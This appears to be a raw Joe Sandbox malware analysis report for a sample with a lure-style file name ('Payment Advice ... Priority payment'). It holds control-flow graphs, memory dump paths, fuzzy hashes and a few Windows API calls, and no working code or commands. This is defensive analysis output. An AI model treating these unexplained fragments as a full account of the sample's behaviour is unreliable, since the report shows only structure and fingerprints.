25bd348 CreateWindowExW 52567->52570 52568->52552 52569->52568 52570->52568 52572 25bd355 52571->52572 52573 25bd38f 52572->52573 52579 25bd170 52572->52579 52573->52563 52576 25bd355 52575->52576 52577 25bd38f 52576->52577 52578 25bd170 CreateWindowExW 52576->52578 52577->52563 52578->52577 52580 25bd175 52579->52580 52582 25bdca0 52580->52582 52583 25bd28c 52580->52583 52582->52582 52584 25bd297 52583->52584 52585 25b5d9c CreateWindowExW 52584->52585 52586 25bdd0f 52585->52586 52589 25bfaa0 52586->52589 52587 25bdd49 52587->52582 52591 25bfbd1 52589->52591 52592 25bfad1 52589->52592 52590 25bfadd 52590->52587 52591->52587 52592->52590 52595 4d509c0 52592->52595 52600 4d509af 52592->52600 52596 4d509eb 52595->52596 52597 4d50a9a 52596->52597 52605 4d51ca0 52596->52605 52608 4d51c93 52596->52608 52601 4d509eb 52600->52601 52602 4d50a9a 52601->52602 52603 4d51ca0 CreateWindowExW 52601->52603 52604 4d51c93 CreateWindowExW 52601->52604 52603->52602 52604->52602 52606 4d51cd5 52605->52606 52607 4d51110 CreateWindowExW 52605->52607 52606->52597 52607->52606 52609 4d51110 CreateWindowExW 52608->52609 52610 4d51cd5 52609->52610 52610->52597 52471 6be2430 52472 6be246a 52471->52472 52473 6be24fb 52472->52473 52474 6be24e6 52472->52474 52476 6be08a4 3 API calls 52473->52476 52479 6be08a4 52474->52479 52478 6be250a 52476->52478 52480 6be08af 52479->52480 52481 6be24f1 52480->52481 52484 6be2e50 52480->52484 52490 6be2e41 52480->52490 52496 6be08ec 52484->52496 52487 6be2e77 52487->52481 52488 6be2e8f CreateIconFromResourceEx 52489 6be2f1e 52488->52489 52489->52481 52491 6be2e6a 52490->52491 52492 6be08ec CreateIconFromResourceEx 52490->52492 52493 6be2e77 52491->52493 52494 6be2e8f CreateIconFromResourceEx 52491->52494 52492->52491 52493->52481 52495 6be2f1e 52494->52495 52495->52481 52497 6be2ea0 CreateIconFromResourceEx 52496->52497 52498 6be2e6a 52497->52498 52498->52487 52498->52488
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                                                                            • API String ID: 0-2723476363
                                                                                                                                            • Opcode ID: 83eded0c0089422c11c268493f3cb19bbf87460737dd6f8d8505c14e1e47b7bf
                                                                                                                                            • Instruction ID: 09ab3df732f27b9aacc89494e0d3598e54ce6fb8e7596fdc720e79a0dfe5571f
                                                                                                                                            • Opcode Fuzzy Hash: 83eded0c0089422c11c268493f3cb19bbf87460737dd6f8d8505c14e1e47b7bf
                                                                                                                                            • Instruction Fuzzy Hash: 1F632D74A00219CFCB24DF28C898A9DB7B2FF48310F1585A9E859AB365DB35ED91CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1262 6be08a4-6be2550 1265 6be2556-6be255b 1262->1265 1266 6be2a33-6be2a9c 1262->1266 1265->1266 1267 6be2561-6be257e 1265->1267 1274 6be2aa3-6be2b2b 1266->1274 1273 6be2584-6be2588 1267->1273 1267->1274 1275 6be258a-6be2594 call 6be08b4 1273->1275 1276 6be2597-6be259b 1273->1276 1317 6be2b36-6be2bb6 1274->1317 1275->1276 1280 6be259d-6be25a7 call 6be08b4 1276->1280 1281 6be25aa-6be25b1 1276->1281 1280->1281 1282 6be26cc-6be26d1 1281->1282 1283 6be25b7-6be25e7 1281->1283 1286 6be26d9-6be26de 1282->1286 1287 6be26d3-6be26d7 1282->1287 1295 6be2db6-6be2ddc 1283->1295 1297 6be25ed-6be26c0 call 6be08c0 * 2 1283->1297 1292 6be26f0-6be2720 call 6be08cc * 3 1286->1292 1287->1286 1291 6be26e0-6be26e4 1287->1291 1294 6be26ea-6be26ed 1291->1294 1291->1295 1292->1317 1318 6be2726-6be2729 1292->1318 1294->1292 1306 6be2dde-6be2dea 1295->1306 1307 6be2dec 1295->1307 1297->1282 1326 6be26c2 1297->1326 1310 6be2def-6be2df4 1306->1310 1307->1310 1333 6be2bbd-6be2c3f 1317->1333 1318->1317 1321 6be272f-6be2731 1318->1321 1321->1317 1323 6be2737-6be276c 1321->1323 1323->1333 1334 6be2772-6be277b 1323->1334 1326->1282 1339 6be2c47-6be2cc9 1333->1339 1335 6be28de-6be28e2 1334->1335 1336 6be2781-6be27db call 6be08cc * 2 call 6be08dc * 2 1334->1336 1338 6be28e8-6be28ec 1335->1338 1335->1339 1382 6be27ed 1336->1382 1383 6be27dd-6be27e6 1336->1383 1342 6be28f2-6be28f8 1338->1342 1343 6be2cd1-6be2cfe 1338->1343 1339->1343 1346 6be28fc-6be2931 1342->1346 1347 6be28fa 1342->1347 1359 6be2d05-6be2d85 1343->1359 1353 6be2938-6be293e 1346->1353 1347->1353 1358 6be2944-6be294c 1353->1358 1353->1359 1361 6be294e-6be2952 1358->1361 1362 6be2953-6be2955 1358->1362 1416 6be2d8c-6be2dae 1359->1416 1361->1362 1367 6be29b7-6be29bd 1362->1367 1368 6be2957-6be297b 1362->1368 1376 6be29bf-6be29da 1367->1376 1377 6be29dc-6be2a0a 1367->1377 1401 6be297d-6be2982 1368->1401 1402 6be2984-6be2988 1368->1402 1392 6be2a12-6be2a1e 1376->1392 1377->1392 1389 6be27f1-6be27f3 1382->1389 1388 6be27e8-6be27eb 1383->1388 1383->1389 1388->1389 1390 6be27fa-6be27fe 1389->1390 1391 6be27f5 1389->1391 1398 6be280c-6be2812 1390->1398 1399 6be2800-6be2807 1390->1399 1391->1390 1392->1416 1417 6be2a24-6be2a30 1392->1417 1405 6be281c-6be2821 1398->1405 1406 6be2814-6be281a 1398->1406 1404 6be28a9-6be28ad 1399->1404 1408 6be2994-6be29a5 1401->1408 1402->1295 1409 6be298e-6be2991 1402->1409 1414 6be28af-6be28c9 1404->1414 1415 6be28cc-6be28d8 1404->1415 1412 6be2827-6be282d 1405->1412 1406->1412 1451 6be29a7 call 6be2e50 1408->1451 1452 6be29a7 call 6be2e41 1408->1452 1409->1408 1420 6be282f-6be2831 1412->1420 1421 6be2833-6be2838 1412->1421 1414->1415 1415->1335 1415->1336 1416->1295 1426 6be283a-6be284c 1420->1426 1421->1426 1424 6be29ad-6be29b5 1424->1392 1432 6be284e-6be2854 1426->1432 1433 6be2856-6be285b 1426->1433 1435 6be2861-6be2868 1432->1435 1433->1435 1437 6be286e 1435->1437 1438 6be286a-6be286c 1435->1438 1442 6be2873-6be287e 1437->1442 1438->1442 1443 6be28a2 1442->1443 1444 6be2880-6be2883 1442->1444 1443->1404 1444->1404 1446 6be2885-6be288b 1444->1446 1447 6be288d-6be2890 1446->1447 1448 6be2892-6be289b 1446->1448 1447->1443 1447->1448 1448->1404 1450 6be289d-6be28a0 1448->1450 1450->1404 1450->1443 1451->1424 1452->1424
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                            • API String ID: 0-1677660839
                                                                                                                                            • Opcode ID: 54c639fdbacc6d8dae2a7820835d744f9105952df981f731eeefdcea271d0bf4
                                                                                                                                            • Instruction ID: e8f813eb4ba87561aa684a228c43abe04770b9629707620af1c4db0aec661743
                                                                                                                                            • Opcode Fuzzy Hash: 54c639fdbacc6d8dae2a7820835d744f9105952df981f731eeefdcea271d0bf4
                                                                                                                                            • Instruction Fuzzy Hash: 8F324A70E002189FEB94DFB8C8547AEBBF6BF84300F1485AAD409AB395DB349D45CB95

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1675 4d56cb8-4d56cb9 1676 4d56c8f-4d5b61f 1675->1676 1677 4d56cbb-4d56cf3 1675->1677 1683 4d5b626-4d5b64b call 4d53428 1676->1683 1679 4d56cf5 1677->1679 1680 4d56cfa-4d56d3c 1677->1680 1679->1680 1689 4d56d46-4d56d52 call 4d56974 1680->1689 1686 4d5b650-4d5b657 1683->1686 1691 4d56d57-4d56f30 call 4d56974 * 9 1689->1691 1729 4d56f3a-4d56f46 call 4d56984 1691->1729 1731 4d56f4b-4d570ed call 4d56974 * 7 1729->1731 1762 4d570f8-4d5710c call 4d56994 1731->1762 1764 4d57111-4d571aa call 4d569a4 1762->1764 1769 4d571b4-4d571c8 call 4d569b4 1764->1769 1771 4d571cd-4d57442 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 1769->1771 1803 4d5744d-4d57463 1771->1803 2232 4d57466 call 4da2d18 1803->2232 2233 4d57466 call 4da2d09 1803->2233 1804 4d5746c-4d574c5 1808 4d574d0-4d574e6 1804->1808 2198 4d574ec call 4da3dd8 1808->2198 2199 4d574ec call 4da3d59 1808->2199 2200 4d574ec call 4da3d5d 1808->2200 2201 4d574ec call 4da3d1d 1808->2201 2202 4d574ec call 4da3d51 1808->2202 2203 4d574ec call 4da3d97 1808->2203 2204 4d574ec call 4da3d55 1808->2204 2205 4d574ec call 4da3d49 1808->2205 2206 4d574ec call 4da3d4d 1808->2206 2207 4d574ec call 4da3d81 1808->2207 2208 4d574ec call 4da3d41 1808->2208 2209 4d574ec call 4da3d45 1808->2209 2210 4d574ec call 4da3d79 1808->2210 2211 4d574ec call 4da3d39 1808->2211 2212 4d574ec call 4da3d7d 1808->2212 2213 4d574ec call 4da3d3d 1808->2213 2214 4d574ec call 4da3d71 1808->2214 2215 4d574ec call 4da3d31 1808->2215 2216 4d574ec call 4da3d75 1808->2216 2217 4d574ec call 4da3d35 1808->2217 2218 4d574ec call 4da3d69 1808->2218 2219 4d574ec call 4da3d29 1808->2219 2220 4d574ec call 4da3d6d 1808->2220 2221 4d574ec call 4da3d2d 1808->2221 2222 4d574ec call 4da3d61 1808->2222 2223 4d574ec call 4da3d21 1808->2223 2224 4d574ec call 4da3d65 1808->2224 2225 4d574ec call 4da3d25 1808->2225 1809 4d574f2-4d574ff 1810 4d57501-4d5750d 1809->1810 1811 4d57529 1809->1811 1812 4d57517-4d5751d 1810->1812 1813 4d5750f-4d57515 1810->1813 1814 4d5752f-4d57537 1811->1814 1815 4d57527 1812->1815 1813->1815 1816 4d5753d-4d5754d 1814->1816 1815->1814 1817 4d57554-4d59228 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d56994 call 4d569a4 call 4d569b4 call 4d569c4 call 4d569d4 call 4d569e4 call 4d569f4 call 4d56a04 call 4d56a14 call 4d56a24 1816->1817 1818 4d5754f 1816->1818 2127 4d5922d-4d59247 1817->2127 1818->1817 2230 4d5924a call 4daacff 2127->2230 2231 4d5924a call 4daad20 2127->2231 2128 4d5924d-4d5935c call 4d56a24 * 7 2148 4d59361-4d5937b 2128->2148 2228 4d5937e call 4daacff 2148->2228 2229 4d5937e call 4daad20 2148->2229 2149 4d59381-4d59564 call 4d56a24 * 10 2181 4d59566-4d59572 2149->2181 2182 4d5958e 2149->2182 2183 4d59574-4d5957a 2181->2183 2184 4d5957c-4d59582 2181->2184 2185 4d59594-4d595a6 call 4d56a34 2182->2185 2187 4d5958c 2183->2187 2184->2187 2188 4d595ab-4d59627 call 4d56a44 call 4d569a4 2185->2188 2187->2185 2194 4d5962c-4d59633 2188->2194 2226 4d59635 call 4daeb88 2194->2226 2227 4d59635 call 4daeb78 2194->2227 2195 4d5963a-4d59641 call 4d56a54 2197 4d59646-4d5964e 2195->2197 2198->1809 2199->1809 2200->1809 2201->1809 2202->1809 2203->1809 2204->1809 2205->1809 2206->1809 2207->1809 2208->1809 2209->1809 2210->1809 2211->1809 2212->1809 2213->1809 2214->1809 2215->1809 2216->1809 2217->1809 2218->1809 2219->1809 2220->1809 2221->1809 2222->1809 2223->1809 2224->1809 2225->1809 2226->2195 2227->2195 2228->2149 2229->2149 2230->2128 2231->2128 2232->1804 2233->1804
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fb37ac3854ece543ff227e9177da2af826bafddda7d01ae5ab38eb4b07dbe7ed
                                                                                                                                            • Instruction ID: cfa194d7e57826f43f65cddf7dfcc80a57e133509f9b76c68c65f500b2d8b68e
                                                                                                                                            • Opcode Fuzzy Hash: fb37ac3854ece543ff227e9177da2af826bafddda7d01ae5ab38eb4b07dbe7ed
                                                                                                                                            • Instruction Fuzzy Hash: 484309B4A10219CFDB15DF24C894BA9B7B5FF8A304F5182E9D6096B361DB30AE85CF44
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq
                                                                                                                                            • API String ID: 0-2768158334
                                                                                                                                            • Opcode ID: 2dabc6b70a4f996793dcb16c1c0c95e80c9803d9e5b1272ad30b607fb91e77d4
                                                                                                                                            • Instruction ID: 208bfe4d5e1a71bd0b48a3b208cb7964e06382a5067ca18047d7a16d8ca412a0
                                                                                                                                            • Opcode Fuzzy Hash: 2dabc6b70a4f996793dcb16c1c0c95e80c9803d9e5b1272ad30b607fb91e77d4
                                                                                                                                            • Instruction Fuzzy Hash: 9681D570E012199FDB09DFA9C894ADEBBB2FF88300F248529D409BB364DB359945CF90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq
                                                                                                                                            • API String ID: 0-2768158334
                                                                                                                                            • Opcode ID: e6e9121993605c9a1f9bbe7fbeaa2fee390e10a8a05076c6a5ec579b46a8ed26
                                                                                                                                            • Instruction ID: f0e821a7306ca29f365c916751b0a42b79ad901f7298d66e5d43a70dcf0331a1
                                                                                                                                            • Opcode Fuzzy Hash: e6e9121993605c9a1f9bbe7fbeaa2fee390e10a8a05076c6a5ec579b46a8ed26
                                                                                                                                            • Instruction Fuzzy Hash: 9F81D770E012199FDB09DFA9C894ADEBBB2FF88300F148529D409BB364DB359946CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74ef5f56f3e8a2d91fcf8d9fb967283e7fc29eb20b748688150a1c60599d91df
                                                                                                                                            • Instruction ID: b4fbbe92eb20e6e45c105b22410f235ca3cbb25d46ffebda66f292f9dbb1e2f5
                                                                                                                                            • Opcode Fuzzy Hash: 74ef5f56f3e8a2d91fcf8d9fb967283e7fc29eb20b748688150a1c60599d91df
                                                                                                                                            • Instruction Fuzzy Hash: 5DC18CB4E002189FDF94DFA4C880799BBF6EF88300F14D1AAD449AB255DB74DA85CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 13743a6b3aae0d25f8133075c25ac81e50bcccde1602a2427a544a1d3b82b75c
                                                                                                                                            • Instruction ID: 3b469233654f6432a5734a5bb5cc697e2706fbbc0e24e970fdb5d36aa4a67e28
                                                                                                                                            • Opcode Fuzzy Hash: 13743a6b3aae0d25f8133075c25ac81e50bcccde1602a2427a544a1d3b82b75c
                                                                                                                                            • Instruction Fuzzy Hash: 5EC16BB4E002189FDF94DF64C880799BBB6EF88300F14D1AAD449AB255DB74DA85CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1888433644.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1887651837.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7130000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e0ae6484a79ef98396c6ae173d4a517e71ce07001b79dfff1cb1ee891d31ccf5
                                                                                                                                            • Instruction ID: c997f4125e11a5e85a45056c9facaa30fa60ade2500e404b3105f98f067aca82
                                                                                                                                            • Opcode Fuzzy Hash: e0ae6484a79ef98396c6ae173d4a517e71ce07001b79dfff1cb1ee891d31ccf5
                                                                                                                                            • Instruction Fuzzy Hash: BB21C7B0D146189BEB18CFABD9547EEFBF7AFC9300F04C16AD40966294EB7409458F90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1501 4daad20-4daad37 1503 4daad9a-4daada8 1501->1503 1504 4daad39-4daad48 1501->1504 1507 4daadaa-4daadb5 call 4da9db8 1503->1507 1508 4daadbb-4daadbd 1503->1508 1504->1503 1509 4daad4a-4daad56 call 4da9e64 1504->1509 1507->1508 1515 4daae7a-4daaece 1507->1515 1547 4daadbf call 4daaecf 1508->1547 1548 4daadbf call 4daaed0 1508->1548 1516 4daad6a-4daad86 1509->1516 1517 4daad58-4daad64 call 4da9e74 1509->1517 1514 4daadc5-4daadd4 1523 4daadec-4daadef 1514->1523 1524 4daadd6-4daade7 call 4da9e84 1514->1524 1530 4daad8c-4daad90 1516->1530 1531 4daae35-4daae73 1516->1531 1517->1516 1525 4daadf0-4daae2e 1517->1525 1524->1523 1525->1531 1530->1503 1531->1515 1547->1514 1548->1514
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq$Hbq
                                                                                                                                            • API String ID: 0-2297679979
                                                                                                                                            • Opcode ID: 65a49d0489b4102d2db7fd86b499bf414975e97b009426635e44e7014e5e0dd8
                                                                                                                                            • Instruction ID: 115c405fa7afc320b411adb0784a438aa61ef8d3a94a0e777c46f26ee3cf321c
                                                                                                                                            • Opcode Fuzzy Hash: 65a49d0489b4102d2db7fd86b499bf414975e97b009426635e44e7014e5e0dd8
                                                                                                                                            • Instruction Fuzzy Hash: BE418D343006108BEB696ABA922463F77EBFFC5245714896DD4028B794EF39EC03C769

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1572 4dac9a8-4daca0a call 4dab948 1578 4daca0c-4daca0e 1572->1578 1579 4daca70-4daca9c 1572->1579 1580 4dacaa3-4dacaab 1578->1580 1581 4daca14-4daca20 1578->1581 1579->1580 1586 4dacab2-4dacbed 1580->1586 1581->1586 1587 4daca26-4daca61 call 4dab954 1581->1587 1604 4dacbf3-4dacc01 1586->1604 1598 4daca66-4daca6f 1587->1598 1605 4dacc0a-4dacc50 1604->1605 1606 4dacc03-4dacc09 1604->1606 1611 4dacc5d 1605->1611 1612 4dacc52-4dacc55 1605->1612 1606->1605 1613 4dacc5e 1611->1613 1612->1611 1613->1613
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                            • Opcode ID: 3a802893a76df9ffe0362737d5e30f0ebb195564128b6bfce6d1fc132904b4b4
                                                                                                                                            • Instruction ID: 1e0995299efffeb5fa5b07916af9200ac93e13030bf9865b2058b66417f6da35
                                                                                                                                            • Opcode Fuzzy Hash: 3a802893a76df9ffe0362737d5e30f0ebb195564128b6bfce6d1fc132904b4b4
                                                                                                                                            • Instruction Fuzzy Hash: 27815974E003199FDB04DFA9C8946AEBBF6FF88310F14852AE409BB354DB349906CB91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1614 4daaed0-4daaef2 1615 4daaefb-4daaf05 1614->1615 1616 4daaef4-4daaefa 1614->1616 1618 4daaf0b-4daaf24 call 4da9eac * 2 1615->1618 1619 4dab141-4dab16d 1615->1619 1626 4daaf2a-4daaf4c 1618->1626 1627 4dab174-4dab199 1618->1627 1619->1627 1634 4daaf4e-4daaf5c call 4da9e84 1626->1634 1635 4daaf5d-4daaf6c 1626->1635 1640 4dab19c-4dab1b0 1627->1640 1641 4daaf6e-4daaf8b 1635->1641 1642 4daaf91-4daafb2 1635->1642 1646 4dab1b2-4dab1cd 1640->1646 1641->1642 1649 4dab002-4dab02a 1642->1649 1650 4daafb4-4daafc5 1642->1650 1673 4dab02d call 4dab410 1649->1673 1674 4dab02d call 4dab400 1649->1674 1653 4daafc7-4daafdf call 4da9ebc 1650->1653 1654 4daaff4-4daaff8 1650->1654 1661 4daafe1-4daafe2 1653->1661 1662 4daafe4-4daaff2 1653->1662 1654->1649 1657 4dab030-4dab055 1664 4dab09b 1657->1664 1665 4dab057-4dab06c 1657->1665 1661->1662 1662->1653 1662->1654 1664->1619 1665->1664 1668 4dab06e-4dab091 1665->1668 1668->1664 1672 4dab093 1668->1672 1672->1664 1673->1657 1674->1657
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                            • Opcode ID: b50e16ef025752ba02dd9b53506df2b225b849973557cd360faf766dd6cb84f5
                                                                                                                                            • Instruction ID: f995a8d90a0b7cfdfe7a3a27aa8d63742146cf07356ce59c14045cb945fa69f9
                                                                                                                                            • Opcode Fuzzy Hash: b50e16ef025752ba02dd9b53506df2b225b849973557cd360faf766dd6cb84f5
                                                                                                                                            • Instruction Fuzzy Hash: ED714D34B011588FDB15EF68C5589AEB7F2FF8A310B2544A9D405EB361CA35ED42CF61

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2786 4d51110-4d51d56 2788 4d51d61-4d51d68 2786->2788 2789 4d51d58-4d51d5e 2786->2789 2790 4d51d73-4d51e12 CreateWindowExW 2788->2790 2791 4d51d6a-4d51d70 2788->2791 2789->2788 2793 4d51e14-4d51e1a 2790->2793 2794 4d51e1b-4d51e53 2790->2794 2791->2790 2793->2794 2798 4d51e55-4d51e58 2794->2798 2799 4d51e60 2794->2799 2798->2799 2800 4d51e61 2799->2800 2800->2800
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D51E02
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: c80f7aea1f4cb04bf557d19fdaa7bb379006f6a138afb1bdfb828066a26207bc
                                                                                                                                            • Instruction ID: 3268e669c23b78d09e764b0ffec8178817b5fd23a8cd97fc9a41dc419d96e7eb
                                                                                                                                            • Opcode Fuzzy Hash: c80f7aea1f4cb04bf557d19fdaa7bb379006f6a138afb1bdfb828066a26207bc
                                                                                                                                            • Instruction Fuzzy Hash: D451B1B1D003599FDF14CF99C984ADEBBB5FF48310F24812AE818AB220DB71A845CF91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2801 4d51cef-4d51d56 2802 4d51d61-4d51d68 2801->2802 2803 4d51d58-4d51d5e 2801->2803 2804 4d51d73-4d51dab 2802->2804 2805 4d51d6a-4d51d70 2802->2805 2803->2802 2806 4d51db3-4d51e12 CreateWindowExW 2804->2806 2805->2804 2807 4d51e14-4d51e1a 2806->2807 2808 4d51e1b-4d51e53 2806->2808 2807->2808 2812 4d51e55-4d51e58 2808->2812 2813 4d51e60 2808->2813 2812->2813 2814 4d51e61 2813->2814 2814->2814
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D51E02
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
